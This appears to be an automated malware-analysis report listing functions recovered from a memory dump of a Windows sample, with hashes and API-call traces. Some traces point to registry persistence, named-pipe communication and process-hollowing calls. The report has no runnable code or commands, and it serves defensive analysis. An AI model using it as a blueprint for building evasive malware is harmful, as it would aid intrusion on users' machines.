  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
